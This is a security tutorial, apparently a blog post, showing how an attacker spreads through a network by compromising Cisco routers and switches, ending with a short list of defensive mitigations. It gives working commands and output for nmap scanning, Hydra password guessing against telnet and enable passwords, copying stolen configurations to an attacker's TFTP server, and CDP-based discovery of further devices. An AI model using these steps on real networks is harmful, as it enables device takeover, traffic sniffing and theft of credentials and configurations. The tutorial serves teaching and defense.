Expanding a network compromise via switches and routers using Backtrack

If you look in the right places, there are plenty of articles on the web describing how to expand an attack by pivoting from one vulnerable Windows or Linux system to another.

This is not the only way that attackers can traverse the network, silently expanding their domain of control. It is also possible to use other devices to expand control of the network, from switches, to PBXs, to multifunction printers.

Recently I have been studying CTP from Offensive Security, which mainly covers advanced Windows attacks, but which also has one module on compromising a Cisco border-router. The techniques of this hack involve using spoofed SNMP packets, to change the configuration of a border-router from the outside, and set-up a GRE tunnel to implement a full-blown MITM attack across the internet (This is a pretty devastating attack. For more detail you will have to sign up for that course I'm afraid ;o)

This attack got me thinking, and researching routers and switches more as an attack vector on the LAN, so here I briefly look at some more fundamental attacks using Cisco switches, showing a small portion of what is possible.

Take note of this information, and use it wisely to understand an attackers mindset, and to defend your network more effectively.

Finding switches

Switches and routers can be relatively easy to find. Starting with the default gateway for example (this is usually the closest router). Also, running a simple traceroute command, will give us a chain of routers through which network traffic will traverse.

Once we have the target IPs, port scanning often works well, as the following namp example shows:

nmap -sTV 192.168.1.202

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-02-10 22:59 GMT

Nmap scan report for 192.168.1.202

Host is up (0.14s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE VERSION

23/tcp open  telnet  Cisco router

80/tcp open  http    Cisco IOS http config

MAC Address: CC:00:07:28:15:03 (Unknown)

Service Info: OS: IOS; Device: router

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds

So, we can see this system is a Cisco router, and I have highlighted in red, that this router has both HTTP and Telnet enabled.

This is historically the norm, but in secure environments organizations should be looking to deploy better solutions such as HTTPS and SSH for router access and configuration.


Attacking the first router

Once we have found a router to attack, in this example we will use THC Hydra to dictionary-attack this router to find the password.

hydra 192.168.1.202 cisco -s 23 -P knownpass.txt -t 1 -w 2

Hydra v5.9 (c) 2010 by van Hauser / THC - use allowed only for legal purposes.

Hydra (http://www.thc.org) starting at 2011-02-10 22:02:53

[DATA] 1 tasks, 1 servers, 46 login tries (l:1/p:46), ~46 tries per task

[DATA] attacking service cisco on port 23

Process 7480: Can not connect [timeout], process exiting

[23][cisco] host: 192.168.1.202   login:    password: secretpass

[STATUS] attack finished for 192.168.1.202 (waiting for childs to finish)

Hydra (http://www.thc.org) finished at 2011-02-10 22:03:04

This only took a few seconds, and the login password is found, so using that initial information, we can now start a further attack, to find the "enable" password.

hydra 192.168.1.202 cisco-enable -s 23 -l secretpass -P knownpass.txt -t 1 -w 2

Warning: You did not supply the initial support to the Cisco via -l, assuming direct console access

Hydra v5.9 (c) 2010 by van Hauser / THC - use allowed only for legal purposes.

Hydra (http://www.thc.org) starting at 2011-02-10 22:03:40

[DATA] 1 tasks, 1 servers, 46 login tries (l:1/p:46), ~46 tries per task

[DATA] attacking service cisco-enable on port 23

[23][cisco-enable] host: 192.168.1.202   login: secretpass   password: bigsecretpass

[STATUS] attack finished for 192.168.1.202 (waiting for childs to finish)

Hydra (http://www.thc.org) finished at 2011-02-10 22:03:50

Note how Cisco devices don't need a user/password combination for Telnet, just a password. This can make dictionary attacks much easier and quicker to perform, just using a single dictionary file, rather than combinations.

Now that we know both the passwords for this device, we can login and continue our attack.


Pwning the configuration

Next we will setup an TFTP server on our attacking Backtrack system (which we can use for file transfers)

atftpd --daemon --port 69 /tmp/

netstat -anup | grep ":69"

udp        0      0 0.0.0.0:69        0.0.0.0:*      7487/atftpd

Then, from the router, lets take a copy of the running configuration to our attacking TFTP server

RouterA#copy running-config tftp://192.168.2.62/stolen.conf

Address or name of remote host [192.168.2.62]?

Destination filename [stolen.conf]?

!!

1062 bytes copied in 7.352 secs (144 bytes/sec)

RouterA#

Now we own the configuration

Switch and router configurations like this can contain lots of juicy information about a network, such as IP addresses and subnets used, and details of other key infrastructure.

We could now edit the switch configuration, at our leisure on our Backtrack system, and upload the edited version back up to the switch

copy tftp://192.168.2.62/edited.conf running-config

Destination filename [running-config]?

Accessing tftp://192.168.2.62/edited.conf...

Loading edited.conf from 192.168.2.62 (via FastEthernet0/0): !

[OK - 1124 bytes]

This can be used for devastating attacks.


Know your neighbors

Let's use the Cisco discovery protocol to find more switches that are connected to this initially compromised switch. We'll use the CDP protocol information that the switch already has, write that info to a file, and offload it to our TFTP server for more analysis.

RouterA#show cdp neighbors detail | redirect flash:/cdp.txt

RouterA#dir

Directory of flash:/

    6  -rw-        5759                      cdp.txt

7864316 bytes total (7855544 bytes free)
RouterA#

RouterA#copy cdp.txt tftp://192.168.2.62/cdp.txt
Address or name of remote host [192.168.2.62]?
Destination filename [cdp.txt]?
!!!
5759 bytes copied in 4.264 secs (1351 bytes/sec)
RouterA#exit
Connection closed by foreign host.

 
Below is an example of the kind of information you can get back from CDP, which includes IP address and IOS version information, very handy for network administrators (and attackers).

-------------------------
Device ID: RouterA
Entry address(es):
  IP address: 192.168.1.202
Platform: cisco 3640,  Capabilities: Router Switch
Interface: FastEthernet1/0,  Port ID (outgoing port): FastEthernet0/0
Holdtime : 159 sec

Version :
Cisco Internetwork Operating System Software
IOS (tm) 3600 Software (C3640-IK9O3S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2007 by cisco Systems, Inc.
Compiled Wed 24-Jan-07 18:02 by ccai

advertisement version: 2
VTP Management Domain: ''
Duplex: full

 


Reviewing the CDP data

Back on our Backtrack system, we can grep through the CDP data we took previously, to find other systems that our compromised switch knows about.

cat /tmp/cdp.txt | grep -A 1 "IP address"
  IP address: 192.168.2.193
Platform: cisco 3640,  Capabilities: Router Switch
--
  IP address: 192.168.2.193
Platform: cisco 3640,  Capabilities: Router Switch
--
  IP address: 10.2.0.223
Platform: cisco 3640,  Capabilities: Router Switch
--
  IP address: 10.2.0.223
Platform: cisco 3640,  Capabilities: Router Switch
--
  IP address: 192.168.1.202
Platform: cisco 3640,  Capabilities: Router Switch
--
  IP address: 10.2.0.212
Platform: cisco 3640,  Capabilities: Router Switch
--
  IP address: 192.168.1.192
Platform: cisco 3640,  Capabilities: Router Switch
--
  IP address: 192.168.1.192
Platform: cisco 3640,  Capabilities: Router Switch
--
  IP address: 10.2.0.202
Platform: cisco 3640,  Capabilities: Router Switch
--
  IP address: 10.2.0.202
Platform: cisco 3640,  Capabilities: Router Switch

So we will distill the information to find switches that are on the 192 network, and start attacking those first:

cat /tmp/cdp.txt | grep "IP address" | cut -d" " -f5 | grep 192 | sort -u
192.168.2.193
192.168.1.192
192.168.1.202


We already knew about 202, but now we know about 2 other switches, time to expand the attack...




More password attacks


So, we expand our attack to the next level, again using a dictionary-attack to guess the passwords.

hydra -M routers.txt cisco -s 23 -P knownpass.txt -t 1 -w 2
Hydra v5.9 (c) 2010 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-02-10 21:51:34
[DATA] 1 tasks, 3 servers, 46 login tries (l:1/p:46), ~138 tries per task
[DATA] attacking service cisco on port 23
[23][cisco] host: 192.168.2.193   login:    password: secretpass
[STATUS] attack finished for 192.168.2.193 (waiting for childs to finish)
[23][cisco] host: 192.168.1.192   login:    password: secretpass
[STATUS] attack finished for 192.168.1.192 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-02-10 21:52:04

Cracking the enable password, as before...

hydra -M routers.txt cisco-enable -s 23 -l secretpass -P knownpass.txt -t 1 -w 2
Warning: You did not supply the initial support to the Cisco via -l, assuming direct console access
Hydra v5.9 (c) 2010 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-02-10 21:54:08
[DATA] 1 tasks, 3 servers, 46 login tries (l:1/p:46), ~138 tries per task
[DATA] attacking service cisco-enable on port 23
[23][cisco-enable] host: 192.168.2.193   login: secretpass   password: bigsecretpass
[STATUS] attack finished for 192.168.2.193 (waiting for childs to finish)
[23][cisco-enable] host: 192.168.1.192   login: secretpass   password: bigsecretpass
[STATUS] attack finished for 192.168.1.192 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-02-10 21:54:41

So, we can see that these switches have the same passwords. It could be that ALL the swtiches on this network have the same passwords. This could make life easier for the administrator (and for a malicious intruder).



This process can be repeated until all the switch and router infrastructure in the network is discovered and compromised.


What can an attacker do with switches that he controls?

Well, a hell of a lot. Once an attacker controls the configuration and access to the router and switch infrastructure, he is only limited by his imagination.

Certainly traffic can be redirected, substituted, and spoofed. Closed ports can be opened and vice versa. New networks can be created and tunneling can be performed. Passwords can be changed, devices can be reconfigured or wiped. Traffic can be sniffed, and any systems on the network can be attacked.

Switches are as fundamental as DNS. If you own the switches and routers of a network, you pretty much own the network.




Network sniffing


If an attacker controls the configuration of the switch, they could reconfigure the switch to turn their port into a span port. Here Cisco describe how to create a span port for traffic sniffing.


http://www.cisco.com/en/US/products/hw/switches/ps708/products_tech_note09186a008015c612.shtml


Span ports are often used in network defense, for setting up IDS systems (such as Snort for example) but they can also be used maliciously.


If a malicious attacker sets up a span port, this could direct a copy of all traffic on the switch to the attackers network port, effectively turning the switch into a hub (from their perspective) and so enabling them to sniff all traffic going through the switch. This would enable capturing of sensitive data, such as passwords and password hashes, which could then be used to enumerate and compromise other systems on the network.




Clever stuff with switch-scripting
 
A switch is basically a purpose-built computer for packet routing, but they can also be requisitioned to do other jobs. Using TCL scripts, switches and routers themselves can be turned into a more functional attack platform.

Here are some powerful ideas from Packetstorm, showing how switches could be used for various purposes, for example as port-scanners, or denial of service tools.

http://www.packetlevel.ch/html/cisco/docs/ciscoattack_v1.1.pdf
http://www.packetlevel.ch/html/cisco/ciscotcl.html

Backdoors can also be introduced and here is an example using TCL from Andy Davis:

http://packetstormsecurity.org/files/author/4553/


Mitigations

So, as you can see, we have barely scratched the surface here, as to what is possible once core network-infrastructure has been compromised. To mitigate some of these threats

• Protect the network from client-side attacks, which are increasingly the source of initial compromises
• Protect your switches with strong passwords/keys and secure protocols
• Limit access to switch configuration, with access control to a specific group of administrative systems
• Enable remote logging and review the logs periodically
• Use security reviews and testing to evaluate and improve your security posture